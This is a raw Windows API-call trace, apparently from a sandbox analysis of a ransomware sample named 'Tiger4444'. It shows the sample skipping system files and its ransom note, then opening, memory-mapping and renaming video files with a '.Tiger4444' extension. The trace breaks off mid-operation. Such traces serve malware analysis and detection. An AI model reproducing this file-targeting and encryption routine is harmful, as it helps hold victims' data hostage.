lstrcmpiW (lpString1="9v2jkjY15yj.mp4", lpString2="NTUSER.DAT") returned -1 [0045.177] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="9v2jkjY15yj.mp4" | out: lpString1="9v2jkjY15yj.mp4") returned="9v2jkjY15yj.mp4" [0045.177] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\9v2jkjY15yj.mp4", dwFileAttributes=0x0) returned 1 [0045.177] lstrlenW (lpString="9v2jkjY15yj.mp4") returned 15 [0045.177] lstrlenW (lpString="Tiger4444") returned 9 [0045.177] lstrcmpiW (lpString1="Y15yj.mp4", lpString2="Tiger4444") returned 1 [0045.177] lstrlenW (lpString=".dll") returned 4 [0045.177] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0045.177] lstrlenW (lpString=".lnk") returned 4 [0045.177] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0045.177] lstrlenW (lpString=".ini") returned 4 [0045.177] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0045.177] lstrlenW (lpString=".sys") returned 4 [0045.177] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0045.177] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\9v2jkjY15yj.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\9v2jkjy15yj.mp4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.177] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.177] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13663056765) returned 1 [0045.178] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=62195) returned 1 [0045.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0045.178] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71bf8 [0045.178] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf600, lpName=0x0) returned 0x2c8 [0045.178] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf600) returned 0xbe0000 [0045.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0045.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0045.179] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0045.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.179] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0045.179] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13663258264) returned 1 [0045.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0045.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0045.180] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.180] CloseHandle (hObject=0x2c8) returned 1 [0045.180] CloseHandle (hObject=0x260) returned 1 [0045.182] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\9v2jkjY15yj.mp4.Tiger4444") returned 63 [0045.182] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\9v2jkjY15yj.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\9v2jkjy15yj.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\9v2jkjY15yj.mp4.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\9v2jkjy15yj.mp4.tiger4444"), dwFlags=0x1) returned 1 [0045.183] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=62208 | out: Addend=0xc6f980) returned 15571840 [0045.183] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4418 [0045.183] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x456676d0, ftCreationTime.dwHighDateTime=0x1d4d467, ftLastAccessTime.dwLowDateTime=0xb3c28020, ftLastAccessTime.dwHighDateTime=0x1d4caca, ftLastWriteTime.dwLowDateTime=0xb3c28020, ftLastWriteTime.dwHighDateTime=0x1d4caca, nFileSizeHigh=0x0, nFileSizeLow=0x9532, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aksfbq.flv", cAlternateFileName="")) returned 1 [0045.183] lstrcmpiW (lpString1="Aksfbq.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.183] lstrcmpiW (lpString1="Aksfbq.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.183] lstrcmpiW (lpString1="Aksfbq.flv", lpString2="Tiger4444.exe") returned -1 [0045.183] lstrcmpiW (lpString1="Aksfbq.flv", lpString2=".") returned 1 [0045.183] lstrcmpiW (lpString1="Aksfbq.flv", lpString2="..") returned 1 [0045.183] lstrcmpiW (lpString1="Aksfbq.flv", lpString2="windows") returned -1 [0045.183] lstrcmpiW (lpString1="Aksfbq.flv", lpString2="bootmgr") returned -1 [0045.183] lstrcmpiW (lpString1="Aksfbq.flv", lpString2="pagefile.sys") returned -1 [0045.183] lstrcmpiW (lpString1="Aksfbq.flv", lpString2="boot") returned -1 [0045.183] lstrcmpiW (lpString1="Aksfbq.flv", lpString2="ids.txt") returned -1 [0045.183] lstrcmpiW (lpString1="Aksfbq.flv", lpString2="NTUSER.DAT") returned -1 [0045.183] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="Aksfbq.flv" | out: lpString1="Aksfbq.flv") returned="Aksfbq.flv" [0045.183] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\Aksfbq.flv", dwFileAttributes=0x0) returned 1 [0045.184] lstrlenW (lpString="Aksfbq.flv") returned 10 [0045.184] lstrlenW (lpString="Tiger4444") returned 9 [0045.184] lstrcmpiW (lpString1="ksfbq.flv", lpString2="Tiger4444") returned -1 [0045.184] lstrlenW (lpString=".dll") returned 4 [0045.184] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0045.184] lstrlenW (lpString=".lnk") returned 4 [0045.184] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0045.184] lstrlenW (lpString=".ini") returned 4 [0045.184] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0045.184] lstrlenW (lpString=".sys") returned 4 [0045.184] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0045.184] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\Aksfbq.flv" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\aksfbq.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.184] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.184] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13663715145) returned 1 [0045.184] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=38194) returned 1 [0045.184] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0045.184] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0045.184] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9840, lpName=0x0) returned 0x2c8 [0045.184] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9840) returned 0xbe0000 [0045.185] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.185] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0045.185] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.185] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0045.185] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.186] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0045.186] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.186] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0045.186] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13663879576) returned 1 [0045.186] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0045.186] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0045.186] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.186] CloseHandle (hObject=0x2c8) returned 1 [0045.186] CloseHandle (hObject=0x260) returned 1 [0045.188] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\Aksfbq.flv.Tiger4444") returned 58 [0045.188] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\Aksfbq.flv" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\aksfbq.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\Aksfbq.flv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\aksfbq.flv.tiger4444"), dwFlags=0x1) returned 1 [0045.189] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=38208 | out: Addend=0xc6f980) returned 15634048 [0045.189] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4420 [0045.189] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14a78600, ftCreationTime.dwHighDateTime=0x1d4cb12, ftLastAccessTime.dwLowDateTime=0x2a74b550, ftLastAccessTime.dwHighDateTime=0x1d4d479, ftLastWriteTime.dwLowDateTime=0x2a74b550, ftLastWriteTime.dwHighDateTime=0x1d4d479, nFileSizeHigh=0x0, nFileSizeLow=0x16cba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CokPtPcir1Km9h.swf", cAlternateFileName="COKPTP~1.SWF")) returned 1 [0045.189] lstrcmpiW (lpString1="CokPtPcir1Km9h.swf", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.189] lstrcmpiW (lpString1="CokPtPcir1Km9h.swf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.189] lstrcmpiW (lpString1="CokPtPcir1Km9h.swf", lpString2="Tiger4444.exe") returned -1 [0045.189] lstrcmpiW (lpString1="CokPtPcir1Km9h.swf", lpString2=".") returned 1 [0045.189] lstrcmpiW (lpString1="CokPtPcir1Km9h.swf", lpString2="..") returned 1 [0045.189] lstrcmpiW (lpString1="CokPtPcir1Km9h.swf", lpString2="windows") returned -1 [0045.189] lstrcmpiW (lpString1="CokPtPcir1Km9h.swf", lpString2="bootmgr") returned 1 [0045.189] lstrcmpiW (lpString1="CokPtPcir1Km9h.swf", lpString2="pagefile.sys") returned -1 [0045.189] lstrcmpiW (lpString1="CokPtPcir1Km9h.swf", lpString2="boot") returned 1 [0045.189] lstrcmpiW (lpString1="CokPtPcir1Km9h.swf", lpString2="ids.txt") returned -1 [0045.189] lstrcmpiW (lpString1="CokPtPcir1Km9h.swf", lpString2="NTUSER.DAT") returned -1 [0045.189] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="CokPtPcir1Km9h.swf" | out: lpString1="CokPtPcir1Km9h.swf") returned="CokPtPcir1Km9h.swf" [0045.189] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\CokPtPcir1Km9h.swf", dwFileAttributes=0x0) returned 1 [0045.189] lstrlenW (lpString="CokPtPcir1Km9h.swf") returned 18 [0045.189] lstrlenW (lpString="Tiger4444") returned 9 [0045.189] lstrcmpiW (lpString1="1Km9h.swf", lpString2="Tiger4444") returned -1 [0045.189] lstrlenW (lpString=".dll") returned 4 [0045.189] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0045.189] lstrlenW (lpString=".lnk") returned 4 [0045.189] lstrcmpiW (lpString1=".swf", lpString2=".lnk") returned 1 [0045.189] lstrlenW (lpString=".ini") returned 4 [0045.189] lstrcmpiW (lpString1=".swf", lpString2=".ini") returned 1 [0045.189] lstrlenW (lpString=".sys") returned 4 [0045.189] lstrcmpiW (lpString1=".swf", lpString2=".sys") returned -1 [0045.189] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\CokPtPcir1Km9h.swf" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\cokptpcir1km9h.swf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.190] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.190] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13664272920) returned 1 [0045.190] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=93370) returned 1 [0045.190] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0045.190] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0045.190] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16fc0, lpName=0x0) returned 0x2c8 [0045.190] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16fc0) returned 0xbe0000 [0045.192] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.192] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0045.192] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.192] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0045.192] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.192] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0045.192] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.192] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0045.192] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13664514979) returned 1 [0045.192] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0045.192] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0045.192] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.193] CloseHandle (hObject=0x2c8) returned 1 [0045.193] CloseHandle (hObject=0x260) returned 1 [0045.195] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\CokPtPcir1Km9h.swf.Tiger4444") returned 66 [0045.195] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\CokPtPcir1Km9h.swf" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\cokptpcir1km9h.swf"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\CokPtPcir1Km9h.swf.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\cokptpcir1km9h.swf.tiger4444"), dwFlags=0x1) returned 1 [0045.196] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=93376 | out: Addend=0xc6f980) returned 15672256 [0045.196] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4421 [0045.196] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x313253e0, ftCreationTime.dwHighDateTime=0x1d4d50d, ftLastAccessTime.dwLowDateTime=0xbb84e380, ftLastAccessTime.dwHighDateTime=0x1d4c687, ftLastWriteTime.dwLowDateTime=0xbb84e380, ftLastWriteTime.dwHighDateTime=0x1d4c687, nFileSizeHigh=0x0, nFileSizeLow=0x16d43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FFQYJepVdSMrceUSp.flv", cAlternateFileName="FFQYJE~1.FLV")) returned 1 [0045.196] lstrcmpiW (lpString1="FFQYJepVdSMrceUSp.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.196] lstrcmpiW (lpString1="FFQYJepVdSMrceUSp.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.196] lstrcmpiW (lpString1="FFQYJepVdSMrceUSp.flv", lpString2="Tiger4444.exe") returned -1 [0045.196] lstrcmpiW (lpString1="FFQYJepVdSMrceUSp.flv", lpString2=".") returned 1 [0045.196] lstrcmpiW (lpString1="FFQYJepVdSMrceUSp.flv", lpString2="..") returned 1 [0045.196] lstrcmpiW (lpString1="FFQYJepVdSMrceUSp.flv", lpString2="windows") returned -1 [0045.196] lstrcmpiW (lpString1="FFQYJepVdSMrceUSp.flv", lpString2="bootmgr") returned 1 [0045.196] lstrcmpiW (lpString1="FFQYJepVdSMrceUSp.flv", lpString2="pagefile.sys") returned -1 [0045.196] lstrcmpiW (lpString1="FFQYJepVdSMrceUSp.flv", lpString2="boot") returned 1 [0045.196] lstrcmpiW (lpString1="FFQYJepVdSMrceUSp.flv", lpString2="ids.txt") returned -1 [0045.196] lstrcmpiW (lpString1="FFQYJepVdSMrceUSp.flv", lpString2="NTUSER.DAT") returned -1 [0045.196] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="FFQYJepVdSMrceUSp.flv" | out: lpString1="FFQYJepVdSMrceUSp.flv") returned="FFQYJepVdSMrceUSp.flv" [0045.196] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\FFQYJepVdSMrceUSp.flv", dwFileAttributes=0x0) returned 1 [0045.197] lstrlenW (lpString="FFQYJepVdSMrceUSp.flv") returned 21 [0045.197] lstrlenW (lpString="Tiger4444") returned 9 [0045.197] lstrcmpiW (lpString1="ceUSp.flv", lpString2="Tiger4444") returned -1 [0045.197] lstrlenW (lpString=".dll") returned 4 [0045.197] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0045.197] lstrlenW (lpString=".lnk") returned 4 [0045.197] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0045.197] lstrlenW (lpString=".ini") returned 4 [0045.197] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0045.197] lstrlenW (lpString=".sys") returned 4 [0045.197] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0045.197] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\FFQYJepVdSMrceUSp.flv" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\ffqyjepvdsmrceusp.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.197] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.197] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13665003908) returned 1 [0045.197] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=93507) returned 1 [0045.197] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0045.197] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71f28 [0045.197] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17050, lpName=0x0) returned 0x2c8 [0045.197] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17050) returned 0xbe0000 [0045.201] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.201] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0045.201] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.201] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0045.201] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.201] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0045.201] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.202] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0045.202] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13665465131) returned 1 [0045.202] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0045.202] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71f28 | out: hHeap=0xc50000) returned 1 [0045.202] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.202] CloseHandle (hObject=0x2c8) returned 1 [0045.202] CloseHandle (hObject=0x260) returned 1 [0045.205] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\FFQYJepVdSMrceUSp.flv.Tiger4444") returned 69 [0045.205] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\FFQYJepVdSMrceUSp.flv" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\ffqyjepvdsmrceusp.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\FFQYJepVdSMrceUSp.flv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\ffqyjepvdsmrceusp.flv.tiger4444"), dwFlags=0x1) returned 1 [0045.206] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=93520 | out: Addend=0xc6f980) returned 15765632 [0045.206] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=4 | out: Addend=0xc6f98c) returned 4423 [0045.206] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1e6fdb0, ftCreationTime.dwHighDateTime=0x1d4d3d6, ftLastAccessTime.dwLowDateTime=0x70c58950, ftLastAccessTime.dwHighDateTime=0x1d4c969, ftLastWriteTime.dwLowDateTime=0x70c58950, ftLastWriteTime.dwHighDateTime=0x1d4c969, nFileSizeHigh=0x0, nFileSizeLow=0x2d7f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JKXNIWeQxs8Bq.swf", cAlternateFileName="JKXNIW~1.SWF")) returned 1 [0045.206] lstrcmpiW (lpString1="JKXNIWeQxs8Bq.swf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.206] lstrcmpiW (lpString1="JKXNIWeQxs8Bq.swf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.206] lstrcmpiW (lpString1="JKXNIWeQxs8Bq.swf", lpString2="Tiger4444.exe") returned -1 [0045.206] lstrcmpiW (lpString1="JKXNIWeQxs8Bq.swf", lpString2=".") returned 1 [0045.206] lstrcmpiW (lpString1="JKXNIWeQxs8Bq.swf", lpString2="..") returned 1 [0045.206] lstrcmpiW (lpString1="JKXNIWeQxs8Bq.swf", lpString2="windows") returned -1 [0045.206] lstrcmpiW (lpString1="JKXNIWeQxs8Bq.swf", lpString2="bootmgr") returned 1 [0045.206] lstrcmpiW (lpString1="JKXNIWeQxs8Bq.swf", lpString2="pagefile.sys") returned -1 [0045.206] lstrcmpiW (lpString1="JKXNIWeQxs8Bq.swf", lpString2="boot") returned 1 [0045.206] lstrcmpiW (lpString1="JKXNIWeQxs8Bq.swf", lpString2="ids.txt") returned 1 [0045.206] lstrcmpiW (lpString1="JKXNIWeQxs8Bq.swf", lpString2="NTUSER.DAT") returned -1 [0045.206] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="JKXNIWeQxs8Bq.swf" | out: lpString1="JKXNIWeQxs8Bq.swf") returned="JKXNIWeQxs8Bq.swf" [0045.206] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\JKXNIWeQxs8Bq.swf", dwFileAttributes=0x0) returned 1 [0045.206] lstrlenW (lpString="JKXNIWeQxs8Bq.swf") returned 17 [0045.206] lstrlenW (lpString="Tiger4444") returned 9 [0045.206] lstrcmpiW (lpString1="xs8Bq.swf", lpString2="Tiger4444") returned 1 [0045.206] lstrlenW (lpString=".dll") returned 4 [0045.206] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0045.206] lstrlenW (lpString=".lnk") returned 4 [0045.206] lstrcmpiW (lpString1=".swf", lpString2=".lnk") returned 1 [0045.206] lstrlenW (lpString=".ini") returned 4 [0045.206] lstrcmpiW (lpString1=".swf", lpString2=".ini") returned 1 [0045.206] lstrlenW (lpString=".sys") returned 4 [0045.206] lstrcmpiW (lpString1=".swf", lpString2=".sys") returned -1 [0045.206] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PdDH9giHo14Og6\\JKXNIWeQxs8Bq.swf" (normalized: "c:\\users\\fd1hvy\\videos\\pddh9giho14og6\\jkxniweqxs8bq.swf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.207] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.207] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13665969747) returned 1 [0045.207] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=11647) returned 1 [0045.207] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0045.207] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d90 [0045.207] 